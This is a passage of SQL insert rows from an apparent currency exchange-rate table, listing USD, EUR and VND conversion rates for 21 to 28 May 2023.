(4186, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-21'),
(4187, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-21'),
(4188, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-21'),
(4189, 1, 'USD', 0.000000, 2, 'EUR', 0.925240, '2023-05-21'),
(4190, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-21'),
(4191, 2, 'EUR', 0.000000, 1, 'USD', 1.080800, '2023-05-21'),
(4192, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-21'),
(4193, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-21'),
(4194, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-21'),
(4195, 1, 'USD', 1.000000, 2, 'EUR', 0.925240, '2023-05-21'),
(4196, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-21'),
(4197, 2, 'EUR', 1.000000, 1, 'USD', 1.080800, '2023-05-21'),
(4198, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-21'),
(4199, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-21'),
(4200, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-21'),
(4201, 1, 'USD', 0.000000, 2, 'EUR', 0.925240, '2023-05-21'),
(4202, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-21'),
(4203, 2, 'EUR', 0.000000, 1, 'USD', 1.080800, '2023-05-21'),
(4204, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-21'),
(4205, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-21'),
(4206, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-21'),
(4207, 1, 'USD', 1.000000, 2, 'EUR', 0.925240, '2023-05-21'),
(4208, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-21'),
(4209, 2, 'EUR', 1.000000, 1, 'USD', 1.080800, '2023-05-21'),
(4210, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-21'),
(4211, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-21'),
(4212, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-21'),
(4213, 1, 'USD', 0.000000, 2, 'EUR', 0.925240, '2023-05-21'),
(4214, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-21'),
(4215, 2, 'EUR', 0.000000, 1, 'USD', 1.080800, '2023-05-21'),
(4216, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-21'),
(4217, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-21'),
(4218, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-21'),
(4219, 1, 'USD', 1.000000, 2, 'EUR', 0.925240, '2023-05-21'),
(4220, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-21'),
(4221, 2, 'EUR', 1.000000, 1, 'USD', 1.080800, '2023-05-21'),
(4222, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-21'),
(4223, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-21'),
(4224, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-21'),
(4225, 1, 'USD', 0.000000, 2, 'EUR', 0.925240, '2023-05-21'),
(4226, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-21'),
(4227, 2, 'EUR', 0.000000, 1, 'USD', 1.080800, '2023-05-21'),
(4228, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-21'),
(4229, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-21'),
(4230, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-21'),
(4231, 1, 'USD', 1.000000, 2, 'EUR', 0.925240, '2023-05-22'),
(4232, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-22'),
(4233, 2, 'EUR', 1.000000, 1, 'USD', 1.080800, '2023-05-22'),
(4234, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-22'),
(4235, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-22'),
(4236, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-22'),
(4237, 1, 'USD', 0.000000, 2, 'EUR', 0.925240, '2023-05-22'),
(4238, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-22'),
(4239, 2, 'EUR', 0.000000, 1, 'USD', 1.080800, '2023-05-22'),
(4240, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-22'),
(4241, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-22'),
(4242, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-22'),
(4243, 1, 'USD', 1.000000, 2, 'EUR', 0.925240, '2023-05-22'),
(4244, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-22'),
(4245, 2, 'EUR', 1.000000, 1, 'USD', 1.080800, '2023-05-22'),
(4246, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-22'),
(4247, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-22'),
(4248, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-22'),
(4249, 1, 'USD', 0.000000, 2, 'EUR', 0.925240, '2023-05-22'),
(4250, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-22'),
(4251, 2, 'EUR', 0.000000, 1, 'USD', 1.080800, '2023-05-22'),
(4252, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-22'),
(4253, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-22'),
(4254, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-22'),
(4255, 1, 'USD', 1.000000, 2, 'EUR', 0.925240, '2023-05-22'),
(4256, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-22'),
(4257, 2, 'EUR', 1.000000, 1, 'USD', 1.080800, '2023-05-22'),
(4258, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-22'),
(4259, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-22'),
(4260, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-22'),
(4261, 1, 'USD', 0.000000, 2, 'EUR', 0.925240, '2023-05-22'),
(4262, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-22'),
(4263, 2, 'EUR', 0.000000, 1, 'USD', 1.080800, '2023-05-22'),
(4264, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-22'),
(4265, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-22'),
(4266, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-22'),
(4267, 1, 'USD', 1.000000, 2, 'EUR', 0.925240, '2023-05-22'),
(4268, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-22'),
(4269, 2, 'EUR', 1.000000, 1, 'USD', 1.080800, '2023-05-22'),
(4270, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-22'),
(4271, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-22'),
(4272, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-22'),
(4273, 1, 'USD', 0.000000, 2, 'EUR', 0.925240, '2023-05-22'),
(4274, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-22'),
(4275, 2, 'EUR', 0.000000, 1, 'USD', 1.080800, '2023-05-22'),
(4276, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-22'),
(4277, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-22'),
(4278, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-22'),
(4279, 1, 'USD', 1.000000, 2, 'EUR', 0.925240, '2023-05-23'),
(4280, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-23'),
(4281, 2, 'EUR', 1.000000, 1, 'USD', 1.080800, '2023-05-23'),
(4282, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-23'),
(4283, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-23'),
(4284, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-23'),
(4285, 1, 'USD', 0.000000, 2, 'EUR', 0.924040, '2023-05-23'),
(4286, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-23'),
(4287, 2, 'EUR', 0.000000, 1, 'USD', 1.082200, '2023-05-23'),
(4288, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-23'),
(4289, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-23'),
(4290, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-23'),
(4291, 1, 'USD', 1.000000, 2, 'EUR', 0.924040, '2023-05-23'),
(4292, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-23'),
(4293, 2, 'EUR', 1.000000, 1, 'USD', 1.082200, '2023-05-23'),
(4294, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-23'),
(4295, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-23'),
(4296, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-23'),
(4297, 1, 'USD', 0.000000, 2, 'EUR', 0.924040, '2023-05-23'),
(4298, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-23'),
(4299, 2, 'EUR', 0.000000, 1, 'USD', 1.082200, '2023-05-23'),
(4300, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-23'),
(4301, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-23'),
(4302, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-23'),
(4303, 1, 'USD', 1.000000, 2, 'EUR', 0.924040, '2023-05-23'),
(4304, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-23'),
(4305, 2, 'EUR', 1.000000, 1, 'USD', 1.082200, '2023-05-23'),
(4306, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-23'),
(4307, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-23'),
(4308, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-23'),
(4309, 1, 'USD', 0.000000, 2, 'EUR', 0.924040, '2023-05-23'),
(4310, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-23'),
(4311, 2, 'EUR', 0.000000, 1, 'USD', 1.082200, '2023-05-23'),
(4312, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-23'),
(4313, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-23'),
(4314, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-23'),
(4315, 1, 'USD', 1.000000, 2, 'EUR', 0.924040, '2023-05-23'),
(4316, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-23'),
(4317, 2, 'EUR', 1.000000, 1, 'USD', 1.082200, '2023-05-23'),
(4318, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-23'),
(4319, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-23'),
(4320, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-23'),
(4321, 1, 'USD', 0.000000, 2, 'EUR', 0.924040, '2023-05-23'),
(4322, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-23'),
(4323, 2, 'EUR', 0.000000, 1, 'USD', 1.082200, '2023-05-23'),
(4324, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-23'),
(4325, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-23'),
(4326, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-23'),
(4327, 1, 'USD', 1.000000, 2, 'EUR', 0.924040, '2023-05-24'),
(4328, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-24'),
(4329, 2, 'EUR', 1.000000, 1, 'USD', 1.082200, '2023-05-24'),
(4330, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-24'),
(4331, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-24'),
(4332, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-24'),
(4333, 1, 'USD', 0.000000, 2, 'EUR', 0.927730, '2023-05-24'),
(4334, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-24'),
(4335, 2, 'EUR', 0.000000, 1, 'USD', 1.077900, '2023-05-24'),
(4336, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-24'),
(4337, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-24'),
(4338, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-24'),
(4339, 1, 'USD', 1.000000, 2, 'EUR', 0.927730, '2023-05-24'),
(4340, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-24'),
(4341, 2, 'EUR', 1.000000, 1, 'USD', 1.077900, '2023-05-24'),
(4342, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-24'),
(4343, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-24'),
(4344, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-24'),
(4345, 1, 'USD', 0.000000, 2, 'EUR', 0.927730, '2023-05-24'),
(4346, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-24'),
(4347, 2, 'EUR', 0.000000, 1, 'USD', 1.077900, '2023-05-24'),
(4348, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-24'),
(4349, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-24'),
(4350, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-24'),
(4351, 1, 'USD', 1.000000, 2, 'EUR', 0.927730, '2023-05-24'),
(4352, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-24'),
(4353, 2, 'EUR', 1.000000, 1, 'USD', 1.077900, '2023-05-24'),
(4354, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-24'),
(4355, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-24'),
(4356, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-24'),
(4357, 1, 'USD', 0.000000, 2, 'EUR', 0.927730, '2023-05-24'),
(4358, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-24'),
(4359, 2, 'EUR', 0.000000, 1, 'USD', 1.077900, '2023-05-24'),
(4360, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-24'),
(4361, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-24'),
(4362, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-24'),
(4363, 1, 'USD', 1.000000, 2, 'EUR', 0.927730, '2023-05-24'),
(4364, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-24'),
(4365, 2, 'EUR', 1.000000, 1, 'USD', 1.077900, '2023-05-24'),
(4366, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-24'),
(4367, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-24'),
(4368, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-24'),
(4369, 1, 'USD', 0.000000, 2, 'EUR', 0.927730, '2023-05-24'),
(4370, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-24'),
(4371, 2, 'EUR', 0.000000, 1, 'USD', 1.077900, '2023-05-24'),
(4372, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-24'),
(4373, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-24'),
(4374, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-24'),
(4375, 1, 'USD', 1.000000, 2, 'EUR', 0.927730, '2023-05-25'),
(4376, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-25'),
(4377, 2, 'EUR', 1.000000, 1, 'USD', 1.077900, '2023-05-25'),
(4378, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-25'),
(4379, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-25'),
(4380, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-25'),
(4381, 1, 'USD', 0.000000, 2, 'EUR', 0.927210, '2023-05-25'),
(4382, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-25'),
(4383, 2, 'EUR', 0.000000, 1, 'USD', 1.078500, '2023-05-25'),
(4384, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-25'),
(4385, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-25'),
(4386, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-25'),
(4387, 1, 'USD', 1.000000, 2, 'EUR', 0.927210, '2023-05-25'),
(4388, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-25'),
(4389, 2, 'EUR', 1.000000, 1, 'USD', 1.078500, '2023-05-25'),
(4390, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-25'),
(4391, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-25'),
(4392, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-25'),
(4393, 1, 'USD', 0.000000, 2, 'EUR', 0.927210, '2023-05-25'),
(4394, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-25'),
(4395, 2, 'EUR', 0.000000, 1, 'USD', 1.078500, '2023-05-25'),
(4396, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-25'),
(4397, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-25'),
(4398, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-25'),
(4399, 1, 'USD', 1.000000, 2, 'EUR', 0.927210, '2023-05-25'),
(4400, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-25'),
(4401, 2, 'EUR', 1.000000, 1, 'USD', 1.078500, '2023-05-25'),
(4402, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-25'),
(4403, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-25'),
(4404, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-25'),
(4405, 1, 'USD', 0.000000, 2, 'EUR', 0.927210, '2023-05-25'),
(4406, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-25'),
(4407, 2, 'EUR', 0.000000, 1, 'USD', 1.078500, '2023-05-25'),
(4408, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-25'),
(4409, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-25'),
(4410, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-25'),
(4411, 1, 'USD', 1.000000, 2, 'EUR', 0.927210, '2023-05-25'),
(4412, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-25'),
(4413, 2, 'EUR', 1.000000, 1, 'USD', 1.078500, '2023-05-25'),
(4414, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-25'),
(4415, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-25'),
(4416, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-25'),
(4417, 1, 'USD', 0.000000, 2, 'EUR', 0.927210, '2023-05-25'),
(4418, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-25'),
(4419, 2, 'EUR', 0.000000, 1, 'USD', 1.078500, '2023-05-25'),
(4420, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-25'),
(4421, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-25'),
(4422, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-25'),
(4423, 1, 'USD', 1.000000, 2, 'EUR', 0.927210, '2023-05-26'),
(4424, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-26'),
(4425, 2, 'EUR', 1.000000, 1, 'USD', 1.078500, '2023-05-26'),
(4426, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-26'),
(4427, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-26'),
(4428, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-26'),
(4429, 1, 'USD', 0.000000, 2, 'EUR', 0.931530, '2023-05-26'),
(4430, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-26'),
(4431, 2, 'EUR', 0.000000, 1, 'USD', 1.073500, '2023-05-26'),
(4432, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-26'),
(4433, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-26'),
(4434, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-26'),
(4435, 1, 'USD', 1.000000, 2, 'EUR', 0.931530, '2023-05-26'),
(4436, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-26'),
(4437, 2, 'EUR', 1.000000, 1, 'USD', 1.073500, '2023-05-26'),
(4438, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-26'),
(4439, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-26'),
(4440, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-26'),
(4441, 1, 'USD', 0.000000, 2, 'EUR', 0.931530, '2023-05-26'),
(4442, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-26'),
(4443, 2, 'EUR', 0.000000, 1, 'USD', 1.073500, '2023-05-26'),
(4444, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-26'),
(4445, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-26'),
(4446, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-26'),
(4447, 1, 'USD', 1.000000, 2, 'EUR', 0.931530, '2023-05-26'),
(4448, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-26'),
(4449, 2, 'EUR', 1.000000, 1, 'USD', 1.073500, '2023-05-26'),
(4450, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-26'),
(4451, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-26'),
(4452, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-26'),
(4453, 1, 'USD', 0.000000, 2, 'EUR', 0.931530, '2023-05-26'),
(4454, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-26'),
(4455, 2, 'EUR', 0.000000, 1, 'USD', 1.073500, '2023-05-26'),
(4456, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-26'),
(4457, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-26'),
(4458, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-26'),
(4459, 1, 'USD', 1.000000, 2, 'EUR', 0.931530, '2023-05-26'),
(4460, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-26'),
(4461, 2, 'EUR', 1.000000, 1, 'USD', 1.073500, '2023-05-26'),
(4462, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-26'),
(4463, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-26'),
(4464, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-26'),
(4465, 1, 'USD', 0.000000, 2, 'EUR', 0.931530, '2023-05-26'),
(4466, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-26'),
(4467, 2, 'EUR', 0.000000, 1, 'USD', 1.073500, '2023-05-26'),
(4468, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-26'),
(4469, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-26'),
(4470, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-26'),
(4471, 1, 'USD', 1.000000, 2, 'EUR', 0.931530, '2023-05-27'),
(4472, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-27'),
(4473, 2, 'EUR', 1.000000, 1, 'USD', 1.073500, '2023-05-27'),
(4474, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-27'),
(4475, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-27'),
(4476, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-27'),
(4477, 1, 'USD', 0.000000, 2, 'EUR', 0.930150, '2023-05-27'),
(4478, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-27'),
(4479, 2, 'EUR', 0.000000, 1, 'USD', 1.075100, '2023-05-27'),
(4480, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-27'),
(4481, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-27'),
(4482, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-27'),
(4483, 1, 'USD', 1.000000, 2, 'EUR', 0.930150, '2023-05-27'),
(4484, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-27'),
(4485, 2, 'EUR', 1.000000, 1, 'USD', 1.075100, '2023-05-27'),
(4486, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-27'),
(4487, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-27'),
(4488, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-27'),
(4489, 1, 'USD', 0.000000, 2, 'EUR', 0.930150, '2023-05-27'),
(4490, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-27'),
(4491, 2, 'EUR', 0.000000, 1, 'USD', 1.075100, '2023-05-27'),
(4492, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-27'),
(4493, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-27'),
(4494, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-27'),
(4495, 1, 'USD', 1.000000, 2, 'EUR', 0.930150, '2023-05-27'),
(4496, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-27'),
(4497, 2, 'EUR', 1.000000, 1, 'USD', 1.075100, '2023-05-27'),
(4498, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-27'),
(4499, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-27'),
(4500, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-27'),
(4501, 1, 'USD', 0.000000, 2, 'EUR', 0.930150, '2023-05-27'),
(4502, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-27'),
(4503, 2, 'EUR', 0.000000, 1, 'USD', 1.075100, '2023-05-27'),
(4504, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-27'),
(4505, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-27'),
(4506, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-27'),
(4507, 1, 'USD', 1.000000, 2, 'EUR', 0.930150, '2023-05-27'),
(4508, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-27'),
(4509, 2, 'EUR', 1.000000, 1, 'USD', 1.075100, '2023-05-27'),
(4510, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-27'),
(4511, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-27'),
(4512, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-27'),
(4513, 1, 'USD', 0.000000, 2, 'EUR', 0.930150, '2023-05-27'),
(4514, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-27'),
(4515, 2, 'EUR', 0.000000, 1, 'USD', 1.075100, '2023-05-27'),
(4516, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-27'),
(4517, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-27'),
(4518, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-27'),
(4519, 1, 'USD', 1.000000, 2, 'EUR', 0.930150, '2023-05-28'),
(4520, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-28'),
(4521, 2, 'EUR', 1.000000, 1, 'USD', 1.075100, '2023-05-28'),
(4522, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-28'),
(4523, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-28'),
(4524, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-28'),
(4525, 1, 'USD', 0.000000, 2, 'EUR', 0.930150, '2023-05-28'),
(4526, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-28'),
(4527, 2, 'EUR', 0.000000, 1, 'USD', 1.075100, '2023-05-28'),
(4528, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-28'),
(4529, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-28'),
(4530, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-28'),
(4531, 1, 'USD', 1.000000, 2, 'EUR', 0.930150, '2023-05-28'),
(4532, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-28'),
(4533, 2, 'EUR', 1.000000, 1, 'USD', 1.075100, '2023-05-28'),
(4534, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-28'),
(4535, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-28'),
(4536, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-28'),
